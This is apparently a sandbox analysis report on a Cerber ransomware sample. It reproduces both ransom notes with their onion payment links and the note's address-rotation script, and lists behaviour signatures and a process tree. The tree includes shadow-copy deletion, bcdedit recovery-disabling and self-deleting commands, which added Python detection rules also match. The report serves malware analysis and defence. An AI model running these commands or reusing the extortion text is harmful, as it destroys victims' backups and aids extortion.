Resubmissions

26/02/2025, 06:49

250226-hld2lswm14 10

25/02/2025, 05:58

250225-gn5fxa1ls9 10

Analysis

  • max time kernel
    120s
  • max time network
    105s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/02/2025, 05:58

General

  • Target

    db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe

  • Size

    261KB

  • MD5

    927635549829f48f929ead0fc59dcb84

  • SHA1

    7c21f900ac8c3ca5311a77a591f002494ad7d85b

  • SHA256

    db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669

  • SHA512

    db1672765f4cdb8faa6bfd7ae993ad27e8b4f25a894d9883624aae80bd33ae2bcb3c8d91e91961f10c8f714e2507766586759362e292b4a6e6f1ade6cf485c0a

  • SSDEEP

    6144:hwHysO+xpuZUVW3CHI4eHKerKFY/pavGOX3MCefFIu:KO+xpBVgeeHKerTRavfXcJfR

Malware Config

Extracted

Path

C:\Users\Admin\Documents\# DECRYPT MY FILES #.txt

Ransom Note
C_E_R_B_E_R R_A_N_S_O_M_W_A_R_E ######################################################################### Cannot you find the files you need? Is the content of the files that you looked for not readable??? It is normal because the files' names, as well as the data in your files have been encrypted. Great! You have turned to be a part of a big community "#Cerb3r Ransomware". ######################################################################### !!! If you are reading this message it means the software "Cerber" has !!! been removed from your computer. !!! HTML instruction ("# DECRYPT MY FILES #.html") always contains a !!! working domain of your personal page! ######################################################################### What is encryption? ------------------- Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users. To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key. But not only it. It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data. ######################################################################### Everything is clear for me but what should I do? ------------------------------------------------ The first step is reading these instructions to the end. Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you. After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions. 
It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them. !!! Any attempts to return your files with the third-party tools can !!! be fatal for your encrypted files. The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files. Finally it will be impossible to decrypt your files. When you make a puzzle, but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly. You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files. ######################################################################### !!! There are several plain steps to restore your files but if you do !!! not follow them we will not be able to help you, and we will not try !!! since you have read this warning already. ######################################################################### For your information the software to decrypt your files (as well as the private key provided together) are paid products. After purchase of the software package you will be able to: 1. decrypt all your files; 2. work with your documents; 3. view your photos and other media; 4. continue your usual and comfortable work at the computer. If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files. ######################################################################### There is a list of temporary addresses to go on your personal page below: _______________________________________________________________________ | | 1. http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5 | | 2. 
http://bqyjebfh25oellur.onion.cab/D692-738D-BB43-0072-C1D5 | | 3. http://bqyjebfh25oellur.onion.nu/D692-738D-BB43-0072-C1D5 | | 4. http://bqyjebfh25oellur.onion.link/D692-738D-BB43-0072-C1D5 | | 5. http://bqyjebfh25oellur.tor2web.org/D692-738D-BB43-0072-C1D5 |_______________________________________________________________________ ######################################################################### What should you do with these addresses? ---------------------------------------- If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it): 1. take a look at the first address (in this case it is http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5); 2. select it with the mouse cursor holding the left mouse button and moving the cursor to the right; 3. release the left mouse button and press the right one; 4. select "Copy" in the appeared menu; 5. run your Internet browser (if you do not know what it is run the Internet Explorer); 6. move the mouse cursor to the address bar of the browser (this is the place where the site address is written); 7. click the right mouse button in the field where the site address is written; 8. select the button "Insert" in the appeared menu; 9. then you will see the address http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5 appeared there; 10. press ENTER; 11. the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling. If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions. If you browse the instructions in HTML format: 1. click the left mouse button on the first address (in this case it is http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5); 2. 
in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address. If for some reason the site cannot be opened check the connection to the Internet. ######################################################################### Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products. Unlike them we are ready to help you always. If you need our help but the temporary sites are not available: 1. run your Internet browser (if you do not know what it is run the Internet Explorer); 2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER; 3. wait for the site loading; 4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed; 5. run Tor Browser; 6. connect with the button "Connect" (if you use the English version); 7. a normal Internet browser window will be opened after the initialization; 8. type or copy the address ________________________________________________________ | | | http://bqyjebfh25oellur.onion/D692-738D-BB43-0072-C1D5 | |________________________________________________________| in this browser address bar; 9. press ENTER; 10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again. If you have any problems during installation or operation of Tor Browser, please, visit https://www.youtube.com/ and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation. 
If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files. ######################################################################### Additional information: You will find the instructions for restoring your files in those folders where you have your encrypted files only. The instructions are made in two file formats - HTML and TXT for your convenience. Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files. The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company. ######################################################################### Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data. The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection. Together we make the Internet a better and safer place. ######################################################################### If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support. ######################################################################### Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.
URLs

http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5

http://bqyjebfh25oellur.onion.cab/D692-738D-BB43-0072-C1D5

http://bqyjebfh25oellur.onion.nu/D692-738D-BB43-0072-C1D5

http://bqyjebfh25oellur.onion.link/D692-738D-BB43-0072-C1D5

http://bqyjebfh25oellur.tor2web.org/D692-738D-BB43-0072-C1D5

http://bqyjebfh25oellur.onion/D692-738D-BB43-0072-C1D5
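The six URLs above are one hidden service reached through five Tor2Web gateways plus the direct .onion address, and the path is a per-victim identifier. Blocking gateway hostnames one at a time misses the next gateway, so the indicator worth keeping is the .onion label and the victim path. The extractor below is an added example and not part of the Triage report; it normalizes gateway URLs to the underlying onion host, pulls out the victim id, and keeps non-Tor URLs separately rather than dropping them. NOTE_EXCERPT is a constructed fragment assembled from the addresses in the extracted note, not the full note.

```python
"""Added example (not part of the Triage report): normalize the ransom-note
URLs into indicators that survive a change of Tor2Web gateway.  Cerber lists
one hidden service behind several clearnet gateways; the stable indicators
are the .onion hostname and the per-victim path, so that is what this
extractor returns.  NOTE_EXCERPT is a constructed fragment built from the
addresses in the extracted note, not the full note."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Tor2Web-style gateway suffixes that appear in this note. Any other
# hostname is reported under "other_urls" rather than silently dropped.
GATEWAY_SUFFIXES = (".onion.to", ".onion.cab", ".onion.nu", ".onion.link", ".tor2web.org")

# v2 onion addresses are 16 base32 characters, v3 are 56; this 2016-era
# sample uses v2, but both forms are accepted.
ONION_LABEL = re.compile(r"^(?:[a-z2-7]{16}|[a-z2-7]{56})$")
URL_RE = re.compile(r"""https?://[^\s|"'<>)]+""")
# Cerber's victim id as seen in this note: five dash-separated hex groups.
VICTIM_ID = re.compile(r"^/([0-9A-F]{4}(?:-[0-9A-F]{4}){4})$")


def normalize_onion(url: str) -> Optional[Tuple[str, str]]:
    """Map a gateway or direct onion URL to (onion_host, path); None if not Tor."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    for suffix in GATEWAY_SUFFIXES:
        if host.endswith(suffix):
            label = host[: -len(suffix)]
            return (label + ".onion", parts.path) if ONION_LABEL.match(label) else None
    if host.endswith(".onion") and ONION_LABEL.match(host[: -len(".onion")]):
        return host, parts.path
    return None


def extract_iocs(text: str) -> Dict[str, List[str]]:
    """Collect onion hosts, gateway hostnames, victim ids and non-Tor URLs."""
    onions, gateways, victim_ids, other = set(), set(), set(), set()
    for url in URL_RE.findall(text):
        norm = normalize_onion(url)
        if norm is None:
            other.add(url)
            continue
        onion_host, path = norm
        onions.add(onion_host)
        seen_host = urlsplit(url).hostname.lower()
        if seen_host != onion_host:
            gateways.add(seen_host)
        m = VICTIM_ID.match(path)
        if m:
            victim_ids.add(m.group(1))
    return {"onion_hosts": sorted(onions), "gateway_hosts": sorted(gateways),
            "victim_ids": sorted(victim_ids), "other_urls": sorted(other)}


# Constructed fragment assembled from the addresses in the extracted note.
NOTE_EXCERPT = """
| 1. http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5 |
| 2. http://bqyjebfh25oellur.onion.cab/D692-738D-BB43-0072-C1D5 |
| 3. http://bqyjebfh25oellur.onion.nu/D692-738D-BB43-0072-C1D5 |
| 4. http://bqyjebfh25oellur.onion.link/D692-738D-BB43-0072-C1D5 |
| 5. http://bqyjebfh25oellur.tor2web.org/D692-738D-BB43-0072-C1D5 |
enter or copy the address https://www.torproject.org/download/download-easy.html.en
| http://bqyjebfh25oellur.onion/D692-738D-BB43-0072-C1D5 |
please, visit https://www.youtube.com/ and type request
"""

if __name__ == "__main__":
    for key, values in extract_iocs(NOTE_EXCERPT).items():
        print(key, values)
```

Run against the excerpt it yields a single onion host, a single victim id, the five gateway hostnames, and the two clearnet URLs (torproject.org and youtube.com) under other_urls, which is where a triage step can decide whether to discard them.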

Extracted

Path

C:\Users\Admin\Documents\# DECRYPT MY FILES #.html

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>&#067;erber &#082;ansomware</title> <style> a { color: #47c; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #333; font-family: "Helvetica Neue", Helvetica, "Segoe UI", Arial, freesans, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; line-height: 1.6; margin: 0; padding: 0; } hr { background-color: #e7e7e7; border: 0 none; border-bottom: 1px solid #c7c7c7; height: 5px; margin: 30px 0; } li { padding: 0 0 7px 7px; } ol { padding-left: 3em; } .container { background-color: #fff; border: 1px solid #c7c7c7; margin: 40px; padding: 40px 40px 20px 40px; } .info, .tor { background-color: #efe; border: 1px solid #bda; display: block; padding: 0px 20px; } .logo { font-size: 12px; font-weight: bold; line-height: 1; margin: 0; } .upd_on { color: red; display: block; } .upd_off { display: none; float: left; } .tor { padding: 10px 0; text-align: center; } .url { margin-right: 5px; } .warning { background-color: #f5e7e7; border: 1px solid #ebccd1; color: #a44; display: block; padding: 15px 10px; text-align: center; } </style> </head> <body> <div class="container"> <h3>C E R B E R&nbsp;&nbsp;&nbsp;R A N S O M W A R E</h3> <hr> <p>Cannot you find the files you need?<br>Is the content of the files that you looked for not readable?</p> <p>It is normal because the files' names, as well as the data in your files have been encrypted.</p> <p>Great!<br>You have turned to be a part of a big community "#C3rber Ransomware".</p> <hr> <p><span class="warning">If you are reading this message it means the software "Cerber" has been removed from your computer.</span></p> <hr> <h3>What is encryption?</h3> <p>Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users.</p> <p>To become an authorized user and keep the modification absolutely reversible (in other words 
to have a possibility to decrypt your files) you should have an individual private key.</p> <p>But not only it.</p> <p>It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data.</p> <hr> <h3>Everything is clear for me but what should I do?</h3> <p>The first step is reading these instructions to the end.</p> <p>Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you.</p> <p>After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions.</p> <p>It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them.</p> <p><span class="warning">!Any attempts to get back your files with the third-party tools can be fatal for your encrypted files!</span></p> <p>The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files.</p> <p>Finally it will be impossible to decrypt your files!</p> <p>When you make a puzzle, but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly.</p> <p>You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files.</p> <hr> <p><span class="warning">There are several plain steps to restore your files but if you do not follow them we will not be able to help you, and we will not try since you have read this warning already.</span></p> <hr> <p>For your information the software to decrypt your files (as well as 
the private key provided together) are paid products.</p> <p>After purchase of the software package you will be able to:</p> <ol> <li>decrypt all your files;</li> <li>work with your documents;</li> <li>view your photos and other media;</li> <li>continue your usual and comfortable work at the computer.</li> </ol> <p>If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files.</p> <hr> <div class="info"> <p>There is a list of temporary addresses to go on your personal page below:</p> <ol> <li><span class="upd_off" id="upd_1">Please wait...</span><a class="url" href="http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5" id="url_1" target="_blank">http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5</a>(<a href="#updateUrl" onClick="return updateUrl();" style="color: red;">Get a NEW address!</a>)</li> <li><a href="http://bqyjebfh25oellur.onion.cab/D692-738D-BB43-0072-C1D5" target="_blank">http://bqyjebfh25oellur.onion.cab/D692-738D-BB43-0072-C1D5</a></li> <li><a href="http://bqyjebfh25oellur.onion.nu/D692-738D-BB43-0072-C1D5" target="_blank">http://bqyjebfh25oellur.onion.nu/D692-738D-BB43-0072-C1D5</a></li> <li><a href="http://bqyjebfh25oellur.onion.link/D692-738D-BB43-0072-C1D5" target="_blank">http://bqyjebfh25oellur.onion.link/D692-738D-BB43-0072-C1D5</a></li> <li><a href="http://bqyjebfh25oellur.tor2web.org/D692-738D-BB43-0072-C1D5" target="_blank">http://bqyjebfh25oellur.tor2web.org/D692-738D-BB43-0072-C1D5</a></li> </ol> </div> <hr> <h3>What should you do with these addresses?</h3> <p>If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it):</p> <ol> <li>take a look at the first address (in this case it is <span class="upd_off" id="upd_2">Please wait...</span><a class="url" 
href="http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5" id="url_2" target="_blank">http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5</a>);</li> <li>select it with the mouse cursor holding the left mouse button and moving the cursor to the right;</li> <li>release the left mouse button and press the right one;</li> <li>select "Copy" in the appeared menu;</li> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>move the mouse cursor to the address bar of the browser (this is the place where the site address is written);</li> <li>click the right mouse button in the field where the site address is written;</li> <li>select the button "Insert" in the appeared menu;</li> <li>then you will see the address <span class="upd_off" id="upd_3">Please wait...</span><a class="url" href="http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5" id="url_3" target="_blank">http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5</a> appeared there;</li> <li>press ENTER;</li> <li>the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions.</p> <p>If you browse the instructions in HTML format:</p> <ol> <li>click the left mouse button on the first address (in this case it is <span class="upd_off" id="upd_4">Please wait...</span><a class="url" href="http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5" id="url_4" target="_blank">http://bqyjebfh25oellur.onion.to/D692-738D-BB43-0072-C1D5</a>);</li> <li>in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address.</li> </ol> <p>If 
for some reason the site cannot be opened check the connection to the Internet.</p> <hr> <p>Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products.</p> <p>Unlike them we are ready to help you always.</p> <p>If you need our help but the temporary sites are not available:</p> <ol> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loading;</li> <li>on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>run Tor Browser;</li> <li>connect with the button "Connect" (if you use the English version);</li> <li>a normal Internet browser window will be opened after the initialization;</li> <li>type or copy the address <span class="tor">http://bqyjebfh25oellur.onion/D692-738D-BB43-0072-C1D5</span> in this browser address bar;</li> <li>press ENTER;</li> <li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li> </ol> <p>If you have any problems during installation or operation of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=install+tor+browser+windows" target="_blank">https://www.youtube.com/</a> and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation.</p> <p>If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files.</p> <hr> <h3>Additional information:</h3> <p>You 
will find the instructions for restoring your files in those folders where you have your encrypted files only.</p> <p>The instructions are made in two file formats - HTML and TXT for your convenience.</p> <p>Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files.</p> <p>The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company.</p> <hr> <p>Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data.</p> <p>The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection.</p> <p>Together we make the Internet a better and safer place.</p> <hr> <p>If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support.</p> <hr> <p>Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.</p> </div> <script> function getXMLHttpRequest() { if (window.XMLHttpRequest) { return new window.XMLHttpRequest; } else { try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } } function getUrlContent(url, callback) { var xhttp = getXMLHttpRequest(); if (xhttp) { xhttp.onreadystatechange = function() { if (xhttp.readyState == 4) { if (xhttp.status == 200) { return callback(xhttp.responseText.replace(/[\s ]+/gm, ""), null); } else { return callback(null, true); } } }; xhttp.open("GET", url + '?_=' + new Date().getTime(), true); xhttp.send(); } else { return callback(null, true); } } function server1(address, callback) { 
getUrlContent("http://btc.blockr.io/api/v1/address/txs/" + address, function(result, error) { if (!error) { var tx = /"tx":"([\w]+)","time_utc":"[\w-:]+","confirmations":[\d]+,"amount":-/.exec(result); if (tx) { getUrlContent("http://btc.blockr.io/api/v1/tx/info/" + tx[1], function(result, error) { if (!error) { var address = /"vouts":\[{"address":"([\w]+)"/.exec(result); if (address) { return callback(address[1], null); } else { return callback(null, true); } } else { return callback(null, true); } }); } else { return callback(null, true); } } else { return callback(null, true); } }); } function server2(address, callback) { getUrlContent("http://api.blockcypher.com/v1/btc/main/addrs/" + address, function(result, error) { if (!error) { var tx = /"tx_hash":"([\w]+)","block_height":[\d]+,"tx_input_n":[\d-]+,"tx_output_n":-/.exec(result); if (tx) { getUrlContent("http://api.blockcypher.com/v1/btc/main/txs/" + tx[1], function(result, error) { if (!error) { var address = /"outputs":\[{"value":[\d]+,"script":"[\w]+","spent_by":"[\w]+","addresses":\["([\w]+)"/.exec(result); if (address) { return callback(address[1], null); } else { return callback(null, true); } } else { return callback(null, true); } }); } else { return callback(null, true); } } else { return callback(null, true); }

Signatures

  • Cerber 3 IoCs

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2016.

  • Cerber family
  • Modifies visibility of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Contacts a large (524) number of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 2 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Modifies Control Panel 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 59 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.
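The "Deletes shadow copies", "Modifies boot configuration data using bcdedit" and "Deletes itself" signatures above correspond to a handful of child process command lines that show up in the process tree of this report: vssadmin delete shadows, wmic shadowcopy delete, two bcdedit /set {default} changes, and a cmd.exe one-liner that kills the dropper, sleeps with ping, then deletes it. The rules below are an added example and not Triage's own detection logic; they match those command lines on process-creation events and then correlate by parent, because one parent spawning two or more distinct recovery-inhibition commands is the pattern worth alerting on, while a lone vssadmin or bcdedit call is routine administration. The Event records are constructed from the command lines in the report's process tree, not telemetry exported from the sandbox.

```python
"""Added example (not part of the Triage report): process-creation rules
for the recovery-inhibition and self-deletion command lines this report
attributes to the Cerber sample, plus a per-parent correlation so that
one process spawning several of them is flagged as a unit.  The log
records below are constructed from the command lines in the report's
process tree; they are not telemetry exported from the sandbox run."""
from __future__ import annotations

import re
from typing import Dict, List, NamedTuple, Set


class Event(NamedTuple):
    image: str          # full path of the created process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


# (rule name, image regex, command-line regex). Matching is case-insensitive
# because cmd.exe and NTFS paths are.
RULES = [
    ("shadow_copy_delete_vssadmin",
     r"\\vssadmin\.exe$", r"delete\s+shadows"),
    ("shadow_copy_delete_wmic",
     r"\\wmic\.exe$", r"shadowcopy\s+delete"),
    ("bcdedit_disable_recovery",
     r"\\bcdedit\.exe$", r"/set\s+\{default\}\s+recoveryenabled\s+no"),
    ("bcdedit_ignore_boot_failures",
     r"\\bcdedit\.exe$", r"/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures"),
    # taskkill, a ping used as a sleep, then del of the killed binary in one
    # cmd invocation: the self-deletion one-liner used twice in this run.
    ("self_delete_cmd_chain",
     r"\\cmd\.exe$", r"taskkill\s+/f\s+/im\s+.*&\s*ping\s+-n\s+\d+.*&\s*del\s+"),
]
COMPILED = [(n, re.compile(i, re.I), re.compile(c, re.I)) for n, i, c in RULES]

# Rules that alone only say "backups were touched"; two or more distinct ones
# from the same parent is the ransomware pattern worth paging on.
RECOVERY_RULES = {"shadow_copy_delete_vssadmin", "shadow_copy_delete_wmic",
                  "bcdedit_disable_recovery", "bcdedit_ignore_boot_failures"}


def match_event(ev: Event) -> List[str]:
    """Names of every rule that fires on a single process-creation event."""
    return [name for name, img_re, cmd_re in COMPILED
            if img_re.search(ev.image) and cmd_re.search(ev.command_line)]


def correlate_by_parent(events: List[Event]) -> Dict[str, Set[str]]:
    """Distinct rule names fired by the children of each parent image."""
    by_parent: Dict[str, Set[str]] = {}
    for ev in events:
        for name in match_event(ev):
            by_parent.setdefault(ev.parent_image, set()).add(name)
    return by_parent


def ransomware_suspects(events: List[Event], threshold: int = 2) -> List[str]:
    """Parents whose children fired at least `threshold` distinct recovery rules."""
    return sorted(parent for parent, fired in correlate_by_parent(events).items()
                  if len(fired & RECOVERY_RULES) >= threshold)


# Constructed records: the five command lines spawned by the dropped
# ReAgentc.exe in this report, plus two benign admin commands that must not fire.
RANSOM_PARENT = r"C:\Users\Admin\AppData\Roaming\{33D7A01A-D90D-3DE7-A628-AFB91CA5B4EB}\ReAgentc.exe"
ADMIN_SHELL = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    Event(r"C:\Windows\system32\vssadmin.exe",
          r'"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet', RANSOM_PARENT),
    Event(r"C:\Windows\system32\wbem\wmic.exe",
          r'"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete', RANSOM_PARENT),
    Event(r"C:\Windows\System32\bcdedit.exe",
          r'"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no', RANSOM_PARENT),
    Event(r"C:\Windows\System32\bcdedit.exe",
          r'"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures', RANSOM_PARENT),
    Event(r"C:\Windows\system32\cmd.exe",
          r'/d /c taskkill /f /im "ReAgentc.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "'
          + RANSOM_PARENT + r'" > NUL', RANSOM_PARENT),
    Event(r"C:\Windows\system32\vssadmin.exe", r"vssadmin.exe list shadows", ADMIN_SHELL),
    Event(r"C:\Windows\System32\bcdedit.exe", r"bcdedit /enum", ADMIN_SHELL),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(match_event(ev) or "-", ev.command_line[:60])
    print("suspects:", ransomware_suspects(SAMPLE_EVENTS))
```

The per-parent set is what keeps the threshold honest: the two benign events from an administrator's cmd.exe never fire, and the dropped ReAgentc.exe is flagged because four distinct recovery rules fired under it, not because any single command is unusual on its own.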

Processes

  • C:\Users\Admin\AppData\Local\Temp\db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe
    "C:\Users\Admin\AppData\Local\Temp\db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Users\Admin\AppData\Local\Temp\db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe
      "C:\Users\Admin\AppData\Local\Temp\db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe"
      2⤵
      • Cerber
      • Modifies visibility of hidden/system files in Explorer
      • Adds policy Run key to start application
      • Drops startup file
      • Loads dropped DLL
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Modifies Control Panel
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2944
      • C:\Users\Admin\AppData\Roaming\{33D7A01A-D90D-3DE7-A628-AFB91CA5B4EB}\ReAgentc.exe
        "C:\Users\Admin\AppData\Roaming\{33D7A01A-D90D-3DE7-A628-AFB91CA5B4EB}\ReAgentc.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Users\Admin\AppData\Roaming\{33D7A01A-D90D-3DE7-A628-AFB91CA5B4EB}\ReAgentc.exe
          "C:\Users\Admin\AppData\Roaming\{33D7A01A-D90D-3DE7-A628-AFB91CA5B4EB}\ReAgentc.exe"
          4⤵
          • Cerber
          • Modifies visibility of hidden/system files in Explorer
          • Adds policy Run key to start application
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Sets desktop wallpaper using registry
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Modifies Control Panel
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:552
          • C:\Windows\system32\vssadmin.exe
            "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:812
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2864
          • C:\Windows\System32\bcdedit.exe
